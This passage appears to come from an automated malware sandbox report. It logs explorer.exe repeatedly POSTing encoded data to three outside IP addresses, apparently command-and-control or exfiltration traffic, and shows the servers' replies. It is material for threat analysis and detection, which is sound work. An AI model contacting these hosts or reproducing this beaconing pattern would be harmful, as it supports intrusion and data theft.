                                                                                    2024-07-24 17:57:54 UTC685INData Raw: 47 74 4a 37 49 4c 41 32 63 68 36 79 2b 61 47 61 4b 7a 53 77 6a 4c 58 78 68 57 47 70 4f 63 4c 47 49 49 4c 6b 34 4a 7a 54 53 75 62 5a 5a 43 33 72 41 6e 5a 7a 41 73 79 6c 70 78 6a 6e 30 5a 59 44 36 6f 44 4f 2f 52 5a 42 63 61 67 4f 54 77 6a 35 58 73 45 53 6e 34 57 6c 31 74 34 66 74 32 56 70 45 39 62 4b 79 55 6c 75 58 35 55 6b 41 63 7a 58 35 2f 75 39 4e 69 4a 54 54 70 4e 32 4e 49 33 54 58 53 55 4d 79 35 33 48 7a 6d 61 69 64 63 73 4d 61 59 38 76 6e 70 50 67 52 78 4b 79 36 36 72 6e 56 41 72 46 56 41 45 36 2f 42 48 55 48 2b 7a 44 63 53 4e 4e 70 53 6a 55 4b 4a 77 78 30 35 5a 6c 78 6a 61 71 79 55 39 34 46 6d 33 43 4b 44 53 46 42 6b 4d 57 4c 4a 50 4b 45 35 36 76 4a 63 59 49 6b 49 65 48 56 46 74 43 7a 69 35 49 41 42 43 34 61 34 63 62 44 66 34 49 53 36 4f 7a 63 77 39
                                                                                    Data Ascii: GtJ7ILA2ch6y+aGaKzSwjLXxhWGpOcLGIILk4JzTSubZZC3rAnZzAsylpxjn0ZYD6oDO/RZBcagOTwj5XsESn4Wl1t4ft2VpE9bKyUluX5UkAczX5/u9NiJTTpN2NI3TXSUMy53HzmaidcsMaY8vnpPgRxKy66rnVArFVAE6/BHUH+zDcSNNpSjUKJwx05ZlxjaqyU94Fm3CKDSFBkMWLJPKE56vJcYIkIeHVFtCzi5IABC4a4cbDf4IS6Ozcw9


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    61192.168.2.1049812167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:54 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1267
                                                                                    2024-07-24 17:57:54 UTC1267OUTData Raw: 5a 33 37 49 4e 74 5a 4c 32 35 66 50 6b 73 63 6b 4d 77 65 7a 36 78 50 67 6c 30 33 61 63 37 53 31 69 31 61 6e 72 53 5a 66 78 6f 47 2f 5a 6e 35 66 69 39 65 64 75 33 45 72 59 63 65 78 47 75 4c 5a 78 53 51 49 63 2f 47 38 4f 57 38 38 4e 4d 76 42 48 51 77 74 6e 6b 43 32 6e 44 49 53 62 37 7a 78 51 4e 75 35 67 64 67 63 4d 38 4a 69 34 55 30 71 75 36 6b 38 6d 4f 42 73 79 37 65 4c 52 58 6a 75 4a 6b 77 49 4d 5a 4b 75 4f 2f 65 61 33 51 35 6c 65 50 38 79 66 43 6c 44 55 59 4e 4e 55 31 6c 6f 6f 6d 61 78 2b 39 53 47 51 41 69 6f 32 2f 6d 2f 62 6a 47 6f 78 37 6e 7a 71 67 72 5a 34 78 78 7a 45 37 78 33 32 74 6c 68 33 42 74 64 67 4e 54 2f 49 78 6d 45 66 4d 76 66 6d 74 72 4a 58 42 79 6e 67 46 56 64 73 78 4d 43 6d 2b 47 39 76 79 79 65 30 77 51 72 38 31 73 2f 6e 43 38 54 4e 35 6a
                                                                                    Data Ascii: Z37INtZL25fPksckMwez6xPgl03ac7S1i1anrSZfxoG/Zn5fi9edu3ErYcexGuLZxSQIc/G8OW88NMvBHQwtnkC2nDISb7zxQNu5gdgcM8Ji4U0qu6k8mOBsy7eLRXjuJkwIMZKuO/ea3Q5leP8yfClDUYNNU1loomax+9SGQAio2/m/bjGox7nzqgrZ4xxzE7x32tlh3BtdgNT/IxmEfMvfmtrJXByngFVdsxMCm+G9vyye0wQr81s/nC8TN5j
                                                                                    2024-07-24 17:57:55 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:55 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:55 UTC685INData Raw: 4e 51 45 2f 48 46 76 31 79 72 6a 6f 51 49 63 48 64 38 6e 79 37 71 59 4d 45 44 50 67 6b 6d 51 4a 77 66 2f 2b 2b 2b 42 33 78 59 6a 6b 47 6e 2f 4e 37 47 52 45 39 4f 56 37 68 64 47 66 6f 49 57 7a 65 5a 6c 6c 4d 6f 48 44 61 30 2b 41 4a 39 71 49 79 71 41 5a 6f 70 52 44 5a 55 5a 36 31 49 54 68 67 66 4f 34 48 62 66 72 48 55 61 47 47 37 4c 58 46 45 6a 57 73 30 47 2b 42 70 47 36 31 75 5a 48 42 6f 66 62 4c 79 70 53 75 6e 59 4a 34 72 41 4a 6c 73 64 2f 55 78 6a 37 44 64 38 63 42 58 56 44 4d 6c 75 6c 6d 2f 76 70 58 56 39 6c 59 4b 53 66 63 78 37 7a 31 77 67 38 48 2f 49 42 46 56 6a 37 69 74 66 35 59 39 4b 69 54 51 6e 78 42 54 36 2b 6b 46 54 2f 58 53 57 55 6b 5a 63 72 54 76 79 75 57 2f 66 4b 42 2b 68 4d 47 59 49 6c 77 77 72 7a 6e 5a 2b 74 51 71 70 73 48 6c 41 76 59 6c 2f
                                                                                    Data Ascii: NQE/HFv1yrjoQIcHd8ny7qYMEDPgkmQJwf/+++B3xYjkGn/N7GRE9OV7hdGfoIWzeZllMoHDa0+AJ9qIyqAZopRDZUZ61IThgfO4HbfrHUaGG7LXFEjWs0G+BpG61uZHBofbLypSunYJ4rAJlsd/Uxj7Dd8cBXVDMlulm/vpXV9lYKSfcx7z1wg8H/IBFVj7itf5Y9KiTQnxBT6+kFT/XSWUkZcrTvyuW/fKB+hMGYIlwwrznZ+tQqpsHlAvYl/


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    62192.168.2.1049813107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:56 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:57:56 UTC1122OUTData Raw: 46 6e 77 45 76 59 71 72 4f 38 70 42 4a 41 6c 56 33 34 45 66 6d 53 7a 6e 6c 38 77 57 73 64 61 32 64 34 66 78 4b 68 61 44 59 69 75 34 4d 41 48 33 44 39 32 6e 72 78 77 31 67 74 64 68 56 4c 44 53 73 51 56 6e 48 4e 73 72 47 5a 50 53 72 39 6d 7a 46 65 57 4f 6c 44 57 57 78 30 33 42 39 41 52 67 35 4a 56 4d 41 4f 34 42 30 71 41 73 68 74 34 52 78 54 4a 79 76 55 72 41 55 6d 67 55 6e 54 4a 4f 6f 57 70 4a 64 74 57 38 63 75 30 70 30 34 44 38 42 4f 58 78 71 43 61 65 4a 62 49 46 42 7a 30 42 6f 65 54 5a 51 71 77 6e 68 47 59 54 39 4f 57 2b 6c 49 72 48 78 2b 33 32 66 66 56 4a 56 54 72 46 4b 6f 63 30 72 6f 52 43 49 6a 41 62 51 50 38 45 78 4c 6e 6e 66 41 6e 36 56 75 66 70 2f 56 44 49 67 41 67 4f 78 4c 61 6e 34 34 4a 67 71 64 2f 54 63 30 35 36 6b 6f 2b 67 77 4c 33 68 52 32 59
                                                                                    Data Ascii: FnwEvYqrO8pBJAlV34EfmSznl8wWsda2d4fxKhaDYiu4MAH3D92nrxw1gtdhVLDSsQVnHNsrGZPSr9mzFeWOlDWWx03B9ARg5JVMAO4B0qAsht4RxTJyvUrAUmgUnTJOoWpJdtW8cu0p04D8BOXxqCaeJbIFBz0BoeTZQqwnhGYT9OW+lIrHx+32ffVJVTrFKoc0roRCIjAbQP8ExLnnfAn6Vufp/VDIgAgOxLan44Jgqd/Tc056ko+gwL3hR2Y
                                                                                    2024-07-24 17:57:57 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:57 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:57 UTC685INData Raw: 56 53 73 61 36 6b 65 31 75 75 6b 65 52 47 4f 74 6e 7a 41 49 67 77 52 4a 56 35 61 4a 6b 30 55 41 52 78 51 33 59 51 31 57 6b 64 52 66 66 45 61 48 33 41 75 37 6e 6a 71 41 46 70 63 72 31 73 5a 39 64 6d 31 6a 35 4c 70 4f 74 53 4c 32 7a 52 39 63 32 54 58 2f 49 2f 2f 70 4a 42 52 4a 66 4a 78 76 44 50 36 46 4a 61 53 5a 41 57 4b 55 39 4d 65 38 6e 31 45 71 5a 79 34 2f 77 49 41 58 6e 62 62 45 4f 51 6d 37 77 4a 2f 2f 63 33 33 49 42 67 61 34 62 71 6a 68 38 56 4e 7a 30 43 66 33 6f 30 35 34 54 44 63 49 4c 74 42 33 61 78 69 66 45 49 55 75 38 57 71 45 79 36 6c 77 33 75 63 71 56 6c 6b 63 37 63 39 42 66 6a 53 2b 68 53 44 4a 35 62 46 2f 53 47 66 57 65 47 78 57 6a 4e 39 61 79 64 61 67 61 31 76 4b 79 32 78 65 58 5a 79 30 33 50 34 55 42 67 78 6e 2b 43 6d 6f 31 79 47 5a 62 59 42
                                                                                    Data Ascii: VSsa6ke1uukeRGOtnzAIgwRJV5aJk0UARxQ3YQ1WkdRffEaH3Au7njqAFpcr1sZ9dm1j5LpOtSL2zR9c2TX/I//pJBRJfJxvDP6FJaSZAWKU9Me8n1EqZy4/wIAXnbbEOQm7wJ//c33IBga4bqjh8VNz0Cf3o054TDcILtB3axifEIUu8WqEy6lw3ucqVlkc7c9BfjS+hSDJ5bF/SGfWeGxWjN9aydaga1vKy2xeXZy03P4UBgxn+Cmo1yGZbYB


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    63192.168.2.1049814107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:58 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:57:58 UTC1122OUTData Raw: 67 6d 63 4f 36 58 55 33 52 7a 59 6f 36 30 6d 78 6e 69 36 42 66 49 6c 55 56 6e 48 45 4d 66 79 55 34 4a 79 5a 70 58 59 78 58 30 41 79 70 53 5a 69 65 7a 57 39 6f 74 71 54 34 47 43 41 69 6a 73 61 54 36 43 61 4d 4a 47 69 72 73 31 6d 35 61 45 62 77 67 77 41 49 46 6b 50 39 53 39 4b 58 6f 45 4f 4d 76 4c 4a 4d 4f 62 76 46 43 79 51 4b 4a 76 61 72 6c 64 50 33 38 6b 2f 6d 73 4b 33 35 2f 78 70 75 6d 4b 56 67 6f 73 4d 63 79 47 4b 59 62 53 2b 54 58 36 67 77 76 43 5a 75 61 6a 44 47 39 64 4c 5a 4e 67 38 6a 58 78 57 68 65 79 68 61 65 66 67 31 4a 6c 37 4a 52 62 30 2b 52 79 6a 76 67 41 4a 35 59 64 70 4e 47 35 59 68 33 68 31 4a 46 77 73 30 41 4c 68 4c 65 62 38 37 73 70 69 42 77 65 44 66 36 50 61 4c 42 55 54 78 32 62 74 66 42 4a 72 7a 43 58 74 77 31 2f 70 45 39 31 4a 49 73 78
                                                                                    Data Ascii: gmcO6XU3RzYo60mxni6BfIlUVnHEMfyU4JyZpXYxX0AypSZiezW9otqT4GCAijsaT6CaMJGirs1m5aEbwgwAIFkP9S9KXoEOMvLJMObvFCyQKJvarldP38k/msK35/xpumKVgosMcyGKYbS+TX6gwvCZuajDG9dLZNg8jXxWheyhaefg1Jl7JRb0+RyjvgAJ5YdpNG5Yh3h1JFws0ALhLeb87spiBweDf6PaLBUTx2btfBJrzCXtw1/pE91JIsx
                                                                                    2024-07-24 17:57:59 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:59 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:59 UTC685INData Raw: 6a 42 65 67 36 53 51 58 71 70 6b 66 77 31 45 45 32 51 35 30 63 79 71 68 30 78 47 52 58 70 4a 6d 57 59 67 67 42 47 75 73 6d 6c 70 32 54 4f 39 4d 36 58 78 4d 6a 72 77 71 31 36 68 41 72 47 54 47 52 43 35 5a 74 4b 51 45 50 68 34 4d 6d 58 77 6f 65 42 30 43 71 4c 6d 42 6b 48 2f 73 43 53 39 4d 31 43 4c 62 56 78 67 42 53 69 36 45 54 57 2f 76 76 55 35 31 67 4d 2f 49 5a 55 51 34 31 79 48 30 6a 38 52 4b 4b 73 46 48 4b 43 4f 55 55 75 51 6a 79 2f 4e 35 4f 6b 35 45 34 76 4c 4f 39 69 4c 35 73 57 62 6c 38 4a 78 50 43 4b 41 54 68 4d 72 5a 6b 4b 59 73 6f 46 58 61 78 6b 57 38 6a 6e 70 77 59 62 6e 33 57 35 73 43 6c 65 68 58 35 6a 74 2b 78 6c 4f 37 61 41 47 59 39 2b 6f 59 78 2f 44 33 6c 71 36 70 6b 76 34 44 48 71 39 4f 57 4d 37 55 66 72 59 33 38 6f 46 7a 42 6b 35 2b 38 39 5a
                                                                                    Data Ascii: jBeg6SQXqpkfw1EE2Q50cyqh0xGRXpJmWYggBGusmlp2TO9M6XxMjrwq16hArGTGRC5ZtKQEPh4MmXwoeB0CqLmBkH/sCS9M1CLbVxgBSi6ETW/vvU51gM/IZUQ41yH0j8RKKsFHKCOUUuQjy/N5Ok5E4vLO9iL5sWbl8JxPCKAThMrZkKYsoFXaxkW8jnpwYbn3W5sClehX5jt+xlO7aAGY9+oYx/D3lq6pkv4DHq9OWM7UfrY38oFzBk5+89Z


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    64192.168.2.1049816167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:00 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:58:00 UTC1122OUTData Raw: 50 50 64 59 53 72 34 2f 4a 34 63 32 34 38 6e 39 46 36 48 6c 51 56 75 55 64 57 36 61 48 69 2b 43 4f 54 5a 68 70 68 42 46 4c 58 66 7a 55 44 45 53 72 54 76 6b 4a 65 36 58 72 57 5a 78 61 59 74 52 2b 64 43 4c 71 70 7a 69 75 51 36 39 39 61 68 6b 55 33 72 77 45 71 6d 44 51 64 37 77 7a 34 53 6f 48 49 7a 57 55 58 41 36 6b 66 54 59 6e 2f 62 64 43 43 56 79 34 46 34 51 6c 33 43 68 67 4f 50 42 54 4b 77 6b 31 55 4d 45 49 66 4f 6f 57 70 67 37 30 63 51 79 61 2f 53 43 59 46 52 32 4c 47 5a 62 2f 63 64 5a 6f 63 56 64 58 54 36 65 41 39 7a 76 36 4c 79 6e 46 68 30 43 4f 42 4d 4d 39 6e 43 69 69 69 79 39 6d 4c 6e 44 32 6b 59 33 52 6c 44 67 4f 64 68 50 2b 4c 76 78 6a 57 4d 49 6f 69 73 70 4d 43 6e 71 31 32 78 6b 73 4c 47 62 56 46 47 4e 6c 54 32 4f 33 70 6a 4f 70 62 35 31 52 63 31
                                                                                    Data Ascii: PPdYSr4/J4c248n9F6HlQVuUdW6aHi+COTZhphBFLXfzUDESrTvkJe6XrWZxaYtR+dCLqpziuQ699ahkU3rwEqmDQd7wz4SoHIzWUXA6kfTYn/bdCCVy4F4Ql3ChgOPBTKwk1UMEIfOoWpg70cQya/SCYFR2LGZb/cdZocVdXT6eA9zv6LynFh0COBMM9nCiiiy9mLnD2kY3RlDgOdhP+LvxjWMIoispMCnq12xksLGbVFGNlT2O3pjOpb51Rc1
                                                                                    2024-07-24 17:58:01 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:01 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:58:01 UTC685INData Raw: 6a 76 6c 77 75 74 53 54 35 30 4f 4f 5a 73 57 46 6c 67 4c 5a 6c 77 34 47 51 4a 39 35 37 6b 35 5a 36 37 50 41 33 4f 56 2b 31 59 4e 33 47 68 41 61 53 55 55 44 6e 70 46 55 75 73 65 50 70 2b 55 58 62 4d 38 6f 76 57 6e 33 2b 44 4b 70 45 50 6a 70 54 55 41 59 78 39 31 41 46 58 76 6b 51 2f 6a 44 6c 56 4c 58 4c 6c 76 36 2f 42 33 44 41 69 33 73 68 76 63 48 2b 45 59 2b 39 70 63 32 30 68 30 34 34 71 74 73 61 34 79 66 4a 53 4d 39 76 2f 65 42 75 30 54 43 73 6b 2f 77 48 39 37 4c 77 78 39 38 65 57 73 4d 30 45 58 31 61 63 53 4c 44 6d 49 2b 5a 39 67 49 55 47 2f 51 65 55 43 6b 49 52 57 62 70 66 66 58 4f 2f 65 79 56 78 47 76 61 38 31 2f 32 37 5a 51 47 64 61 70 5a 65 6b 46 69 75 46 41 37 38 5a 31 46 54 56 32 4e 4f 51 45 56 35 76 79 7a 51 4a 66 6d 6c 77 70 50 73 69 61 39 58 54
                                                                                    Data Ascii: jvlwutST50OOZsWFlgLZlw4GQJ957k5Z67PA3OV+1YN3GhAaSUUDnpFUusePp+UXbM8ovWn3+DKpEPjpTUAYx91AFXvkQ/jDlVLXLlv6/B3DAi3shvcH+EY+9pc20h044qtsa4yfJSM9v/eBu0TCsk/wH97Lwx98eWsM0EX1acSLDmI+Z9gIUG/QeUCkIRWbpffXO/eyVxGva81/27ZQGdapZekFiuFA78Z1FTV2NOQEV5vyzQJfmlwpPsia9XT


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    65192.168.2.1049817107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:02 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1267
                                                                                    2024-07-24 17:58:02 UTC1267OUTData Raw: 4e 4e 6c 44 6c 62 6d 61 66 77 35 70 2f 6f 43 59 6e 52 69 6d 53 70 36 46 4e 78 62 72 67 58 62 62 41 42 7a 6f 4b 61 36 63 4b 78 59 71 6b 57 56 41 68 65 6b 5a 43 79 55 64 34 63 61 43 37 65 50 65 51 70 32 45 57 63 2b 7a 30 58 79 7a 37 4f 68 51 48 4d 77 38 62 67 45 32 72 61 4e 74 44 7a 43 66 56 6d 47 70 6a 63 44 46 48 54 63 4d 76 37 58 70 74 39 4a 4b 79 42 6f 70 6f 5a 74 6b 34 45 75 32 76 5a 44 61 67 6a 57 57 4f 62 67 4c 2b 55 42 79 66 42 6a 6a 6b 6a 49 47 55 4c 74 35 32 4a 68 49 67 31 69 49 77 2b 34 65 35 77 32 6b 62 76 45 78 6d 7a 2f 4c 38 70 4c 6a 74 48 2f 62 54 6e 6a 77 45 46 56 48 61 56 2b 41 70 30 35 65 33 65 66 71 7a 6a 41 37 4d 47 77 35 43 70 79 57 42 59 74 4b 6d 35 69 55 79 77 6b 44 31 4c 4e 31 4a 37 32 36 55 45 38 78 4f 52 54 74 67 32 78 61 61 56 46
                                                                                    Data Ascii: NNlDlbmafw5p/oCYnRimSp6FNxbrgXbbABzoKa6cKxYqkWVAhekZCyUd4caC7ePeQp2EWc+z0Xyz7OhQHMw8bgE2raNtDzCfVmGpjcDFHTcMv7Xpt9JKyBopoZtk4Eu2vZDagjWWObgL+UByfBjjkjIGULt52JhIg1iIw+4e5w2kbvExmz/L8pLjtH/bTnjwEFVHaV+Ap05e3efqzjA7MGw5CpyWBYtKm5iUywkD1LN1J726UE8xORTtg2xaaVF
                                                                                    2024-07-24 17:58:03 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:03 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:58:03 UTC685INData Raw: 55 7a 4c 61 66 66 45 56 75 4d 73 55 68 34 2b 57 2b 54 45 76 71 30 57 38 77 2f 39 64 67 59 6d 6c 52 61 67 4e 51 42 45 31 61 68 44 4c 36 59 4b 39 31 58 47 75 31 4b 38 79 76 4b 70 6b 46 68 4b 4b 4d 58 6a 55 7a 45 38 5a 79 45 77 38 39 46 54 42 6d 44 36 41 65 41 63 6e 75 72 65 34 48 42 6d 67 50 70 46 2b 47 75 64 45 42 32 2b 56 45 6b 66 49 65 67 33 34 55 65 30 50 63 6a 46 57 4e 43 75 69 66 4f 74 58 76 53 4f 6a 75 73 4e 69 6a 66 41 4b 45 48 74 4f 74 52 64 35 63 64 47 68 43 68 59 42 32 61 73 36 67 42 76 54 39 67 79 6a 56 76 6b 4b 62 54 73 6c 76 36 57 61 4e 30 66 48 66 58 72 55 54 55 42 41 45 44 6b 33 30 73 6e 69 54 50 47 43 34 65 4f 69 67 2b 61 37 41 39 69 58 35 31 72 56 77 30 34 4f 35 4b 38 6f 64 32 35 4e 49 61 55 61 59 6d 6b 31 4f 68 71 59 77 52 5a 69 56 53 71
                                                                                    Data Ascii: UzLaffEVuMsUh4+W+TEvq0W8w/9dgYmlRagNQBE1ahDL6YK91XGu1K8yvKpkFhKKMXjUzE8ZyEw89FTBmD6AeAcnure4HBmgPpF+GudEB2+VEkfIeg34Ue0PcjFWNCuifOtXvSOjusNijfAKEHtOtRd5cdGhChYB2as6gBvT9gyjVvkKbTslv6WaN0fHfXrUTUBAEDk30sniTPGC4eOig+a7A9iX51rVw04O5K8od25NIaUaYmk1OhqYwRZiVSq


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    66192.168.2.1049818107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:04 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:58:04 UTC1122OUTData Raw: 44 71 63 36 52 30 69 41 44 50 4b 70 38 33 79 62 70 68 65 79 53 50 73 77 38 51 70 41 63 64 66 41 55 6c 30 56 76 73 43 4d 55 78 50 7a 44 44 6a 37 41 42 75 4f 66 53 58 46 2f 67 66 63 39 57 42 4d 38 33 52 72 6a 61 47 5a 44 7a 33 77 4e 42 68 30 68 30 6c 50 35 51 57 2f 6c 63 4a 49 62 2b 6f 79 2f 65 59 62 73 6f 30 56 68 44 33 63 35 2b 61 42 76 43 33 47 74 62 71 51 6d 4e 55 2f 73 47 49 59 61 2f 37 50 2f 4a 65 33 31 34 2f 77 39 69 74 49 7a 30 66 59 57 54 45 76 69 6e 59 34 70 71 6c 2b 4d 31 4d 73 53 59 73 54 4b 6e 47 41 4e 63 67 69 72 46 48 2b 70 77 6a 51 6c 2f 54 35 70 4b 6c 42 5a 6e 41 4b 76 53 34 4c 45 41 64 66 67 35 55 2b 4b 42 45 67 68 66 41 64 41 34 47 6e 6a 4b 38 6d 2f 4c 31 71 65 4e 4d 55 6b 77 72 44 33 38 31 2b 2b 65 79 36 57 59 64 69 34 4b 31 4b 4f 4c 4d
                                                                                    Data Ascii: Dqc6R0iADPKp83ybpheySPsw8QpAcdfAUl0VvsCMUxPzDDj7ABuOfSXF/gfc9WBM83RrjaGZDz3wNBh0h0lP5QW/lcJIb+oy/eYbso0VhD3c5+aBvC3GtbqQmNU/sGIYa/7P/Je314/w9itIz0fYWTEvinY4pql+M1MsSYsTKnGANcgirFH+pwjQl/T5pKlBZnAKvS4LEAdfg5U+KBEghfAdA4GnjK8m/L1qeNMUkwrD381++ey6WYdi4K1KOLM
                                                                                    2024-07-24 17:58:05 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:05 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:58:05 UTC685INData Raw: 63 43 41 55 4d 2f 4b 78 59 43 73 41 71 44 33 56 2b 5a 55 7a 37 61 67 72 63 61 4f 74 5a 58 41 49 57 45 72 34 63 39 4c 62 67 42 6d 6f 4a 48 6d 72 7a 35 52 31 46 36 63 43 54 4e 6c 38 65 6a 57 32 65 45 66 69 6a 61 34 33 2f 6a 58 31 44 4d 39 39 4c 38 5a 70 70 59 36 39 78 2b 37 61 61 72 63 51 6a 39 34 58 39 67 56 58 62 4c 38 79 65 76 38 6b 6d 70 32 30 6b 44 67 56 68 75 55 31 41 70 34 6e 78 74 79 42 61 36 62 66 6d 42 44 6f 47 58 75 36 64 69 51 50 58 32 53 49 41 4b 62 47 6f 37 52 34 75 6d 59 5a 33 77 50 65 44 41 4f 32 34 38 77 35 54 63 68 43 73 6f 51 36 67 70 74 50 35 4e 74 6c 4d 61 6e 33 53 34 69 2f 41 6a 6b 43 47 59 73 5a 6f 59 46 38 52 64 68 32 55 6d 64 65 5a 77 6a 72 38 72 61 34 52 61 64 70 53 79 61 45 30 78 6d 77 5a 64 53 66 47 4f 4c 69 59 4c 42 5a 57 6e 46
                                                                                    Data Ascii: cCAUM/KxYCsAqD3V+ZUz7agrcaOtZXAIWEr4c9LbgBmoJHmrz5R1F6cCTNl8ejW2eEfija43/jX1DM99L8ZppY69x+7aarcQj94X9gVXbL8yev8kmp20kDgVhuU1Ap4nxtyBa6bfmBDoGXu6diQPX2SIAKbGo7R4umYZ3wPeDAO248w5TchCsoQ6gptP5NtlMan3S4i/AjkCGYsZoYF8Rdh2UmdeZwjr8ra4RadpSyaE0xmwZdSfGOLiYLBZWnF


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    67192.168.2.1049819167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:06 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:58:06 UTC1122OUTData Raw: 4e 4b 42 54 49 50 4e 73 46 79 5a 6c 78 2b 50 31 4d 38 30 37 76 52 39 68 49 6b 31 64 72 76 6f 43 6f 65 55 39 66 4c 54 70 55 56 69 2f 58 36 6f 4b 5a 6b 66 4c 64 64 50 36 4b 73 69 4b 32 67 55 4f 44 66 62 63 5a 4e 42 2b 39 53 33 46 6e 5a 30 4a 79 4a 6e 66 33 5a 44 4c 41 5a 61 42 4e 6c 6e 6a 31 4a 2f 74 53 32 45 64 44 56 64 69 4f 62 4e 47 78 54 6e 4e 6d 35 46 47 37 75 58 4c 55 4a 45 62 6c 72 78 56 76 4c 32 70 63 30 6b 4a 70 71 76 6f 70 67 55 4f 31 2b 77 78 6c 36 78 50 6f 4c 59 46 71 42 6a 65 63 49 6b 6e 59 43 54 42 41 42 70 55 4f 6d 38 47 46 6d 56 4b 51 54 57 31 4f 75 73 44 77 5a 37 71 42 66 47 50 4f 7a 4a 38 78 51 6b 59 62 43 32 6f 45 74 52 56 78 6b 33 6e 53 5a 76 42 4e 62 71 72 46 78 72 4b 79 30 73 46 75 74 6f 2b 41 64 41 43 59 79 48 72 34 4d 57 30 62 45 68
                                                                                    Data Ascii: NKBTIPNsFyZlx+P1M807vR9hIk1drvoCoeU9fLTpUVi/X6oKZkfLddP6KsiK2gUODfbcZNB+9S3FnZ0JyJnf3ZDLAZaBNlnj1J/tS2EdDVdiObNGxTnNm5FG7uXLUJEblrxVvL2pc0kJpqvopgUO1+wxl6xPoLYFqBjecIknYCTBABpUOm8GFmVKQTW1OusDwZ7qBfGPOzJ8xQkYbC2oEtRVxk3nSZvBNbqrFxrKy0sFuto+AdACYyHr4MW0bEh
                                                                                    2024-07-24 17:58:07 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:07 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
